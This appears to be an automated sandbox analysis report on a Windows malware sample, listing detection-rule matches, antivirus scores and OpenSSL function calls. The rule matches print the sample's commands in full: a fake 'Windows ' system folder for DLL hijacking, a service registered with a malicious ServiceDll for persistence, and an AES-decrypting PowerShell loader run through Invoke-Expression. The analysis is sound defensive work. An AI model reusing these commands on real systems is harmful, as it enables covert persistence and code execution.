    Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y, CommandLine: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\xcopy.exe, NewProcessName: C:\Windows\System32\xcopy.exe, OriginalFileName: C:\Windows\System32\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2044, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y, ProcessId: 3268, ProcessName: xcopy.exe
    Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4552, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs" , ProcessId: 6276, ProcessName: wscript.exe
    Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x338625\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x338625.dat" /f && sc start x338625, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7072, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x338625 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 1256, ProcessName: sc.exe
    Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine: powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky
    Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6324, ProcessName: svchost.exe
    No Suricata rule has matched


    AV Detection

    Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat, ReversingLabs: Detection: 54%
    Source: C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat, Virustotal: Detection: 41%
    Source: C:\Windows \System32\x249569.dat, ReversingLabs: Detection: 54%
    Source: C:\Windows \System32\x249569.dat, Virustotal: Detection: 41%
    Source: C:\Windows\System32\console_zero.exe, ReversingLabs: Detection: 75%
    Source: C:\Windows\System32\console_zero.exe, Virustotal: Detection: 71%
    Source: C:\Windows\System32\usvc.dat, ReversingLabs: Detection: 95%
    Source: C:\Windows\System32\usvc.dat, Virustotal: Detection: 56%
    Source: C:\Windows\System32\x338625.dat, ReversingLabs: Detection: 79%
    Source: F.7z, ReversingLabs: Detection: 27%
    Source: F.7z, Virustotal: Detection: 31%
    Source: C:\Windows\System32\x338625.dat, Joe Sandbox ML: detected
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,46_2_00007FFA2CE72DB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2EDB0 CRYPTO_THREAD_run_once,46_2_00007FFA2CE2EDB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA0D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA0D80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE54D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,46_2_00007FFA2CE54D30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4CD10
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE7ED00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,46_2_00007FFA2CE2ECD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE94CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE94CC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE24E80 CRYPTO_free,46_2_00007FFA2CE24E80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE7EDD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3CDC0 CRYPTO_malloc,CRYPTO_clear_free,46_2_00007FFA2CE3CDC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE82FA0 ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_set_mark,ERR_pop_to_mark,ERR_new,ERR_set_debug,ERR_clear_last_mark,EVP_CIPHER_CTX_get0_cipher,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE82FA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8EFA0 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,46_2_00007FFA2CE8EFA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,46_2_00007FFA2CE72F60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE96F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE96F60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE32F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,46_2_00007FFA2CE32F50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,46_2_00007FFA2CE72F00
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE40EF0 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE40EF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7EED0 CRYPTO_malloc,CRYPTO_free,46_2_00007FFA2CE7EED0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE4CED0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2B0B0 i2d_PUBKEY,ASN1_item_i2d,CRYPTO_free,46_2_00007FFA2CE2B0B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA1090 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA1090
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE35070 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE35070
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE35050 CRYPTO_set_ex_data,46_2_00007FFA2CE35050
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73040 RAND_priv_bytes_ex,CRYPTO_zalloc,EVP_CIPHER_fetch,EVP_CIPHER_CTX_new,EVP_CIPHER_free,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_doall,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,EVP_CIPHER_free,46_2_00007FFA2CE73040
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE45040 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE45040
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B040 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE8B040
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE21030 GetEnvironmentVariableW,GetACP,MultiByteToWideChar,malloc,MultiByteToWideChar,GetEnvironmentVariableW,malloc,GetEnvironmentVariableW,WideCharToMultiByte,CRYPTO_malloc,WideCharToMultiByte,CRYPTO_free,free,free,getenv,46_2_00007FFA2CE21030
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2D010 EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE2D010
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE41000 CRYPTO_malloc,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_realloc,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,46_2_00007FFA2CE41000
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6CFF0 CRYPTO_realloc,46_2_00007FFA2CE6CFF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8AFE0 CRYPTO_free,46_2_00007FFA2CE8AFE0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA8FD0 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CEA8FD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE26FC0 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,46_2_00007FFA2CE26FC0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4C9A0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4C9A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6E960 BIO_ADDR_family,BIO_ADDR_family,memcmp,BIO_ADDR_family,BIO_ADDR_family,memcmp,CRYPTO_malloc,BIO_ADDR_clear,BIO_ADDR_clear,46_2_00007FFA2CE6E960
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7A940 CRYPTO_zalloc,46_2_00007FFA2CE7A940
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22940 CRYPTO_zalloc,_beginthreadex,CRYPTO_free,46_2_00007FFA2CE22940
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE92930 CRYPTO_realloc,46_2_00007FFA2CE92930
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6A910 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,46_2_00007FFA2CE6A910
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2CAB0 X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,46_2_00007FFA2CE2CAB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE36A90 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_new_reserve,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,OSSL_PARAM_construct_int,OSSL_PARAM_construct_end,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,46_2_00007FFA2CE36A90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22A80 CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE22A80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7AA70 CRYPTO_realloc,46_2_00007FFA2CE7AA70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE34A72 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE34A72
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE86A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE86A60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE54A60 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,46_2_00007FFA2CE54A60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE96A30 CRYPTO_memcmp,ERR_new,ERR_set_debug,memchr,ERR_new,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE96A30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44A20 ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE44A20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE349F0 CRYPTO_memdup,CRYPTO_free,46_2_00007FFA2CE349F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA69E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,EVP_CIPHER_free,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,46_2_00007FFA2CEA69E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3E9C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,46_2_00007FFA2CE3E9C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE949C0 CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,46_2_00007FFA2CE949C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE56BB0 CRYPTO_malloc,46_2_00007FFA2CE56BB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE72BA0 OPENSSL_LH_retrieve,CRYPTO_zalloc,CRYPTO_free,OPENSSL_LH_insert,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_insert,46_2_00007FFA2CE72BA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE88B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE88B90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE98B90 CRYPTO_free,CRYPTO_memdup,46_2_00007FFA2CE98B90
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6AB80 CRYPTO_free,46_2_00007FFA2CE6AB80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4CB80 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4CB80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2AB80 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,X509_free,EVP_PKEY_free,d2i_PUBKEY_ex,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,46_2_00007FFA2CE2AB80
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2CB70 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,EVP_PKEY_up_ref,X509_up_ref,EVP_PKEY_up_ref,X509_chain_up_ref,CRYPTO_memdup,CRYPTO_malloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,X509_STORE_free,X509_STORE_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_malloc,memcpy,CRYPTO_memdup,X509_STORE_up_ref,X509_STORE_up_ref,CRYPTO_strdup,46_2_00007FFA2CE2CB70
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE56B30 CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE56B30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8CB30 EVP_MD_get_size,ERR_new,ERR_set_debug,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,EVP_DigestInit_ex,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,EVP_DigestUpdate,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key_ex,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestSignInit_ex,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,46_2_00007FFA2CE8CB30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA0B30 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CEA0B30
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7EB20 CRYPTO_free,46_2_00007FFA2CE7EB20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE90B20 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,46_2_00007FFA2CE90B20
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3AAD0 CRYPTO_set_ex_data,46_2_00007FFA2CE3AAD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA0AD0 CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CEA0AD0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE44CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,46_2_00007FFA2CE44CB0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE88CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,46_2_00007FFA2CE88CA0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE28C60 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,46_2_00007FFA2CE28C60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE22C60 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE22C60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEACC60 BN_bin2bn,ERR_new,ERR_set_debug,BN_ucmp,BN_is_zero,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEACC60
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6AC50 CRYPTO_zalloc,OSSL_ERR_STATE_new,CRYPTO_free,46_2_00007FFA2CE6AC50
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE3ABF0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,46_2_00007FFA2CE3ABF0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE725B0 OPENSSL_cleanse,CRYPTO_free,46_2_00007FFA2CE725B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE545A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,46_2_00007FFA2CE545A0
